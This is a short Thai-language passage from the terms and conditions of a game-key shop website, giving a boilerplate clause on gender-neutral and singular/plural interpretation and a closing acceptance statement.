16.6 เพศเป็นกลาง: เมื่อใดก็ตามที่ใช้ในที่นี้และจำเป็นโดยบริบท เลขเอกพจน์ให้รวมพหูพจน์ พหูพจน์ให้รวมเลขเอกพจน์ และการใช้เพศใดเพศหนึ่งให้รวมถึงทั้งเพศและคำว่า “ในที่นี้” และ “ในที่นี้” และ “ต่อจากนี้ไป” จะหมายถึงข้อตกลงทั้งหมดและไม่ใช่ข้อกำหนดหรือส่วนใด ๆ

คุณรับทราบว่าคุณได้อ่าน เข้าใจ และยอมรับที่จะผูกพันตามข้อกำหนดและเงื่อนไขเหล่านี้

cdkey.digital
Logo
Compare items
  • Total (0)
Compare
0
Shopping cart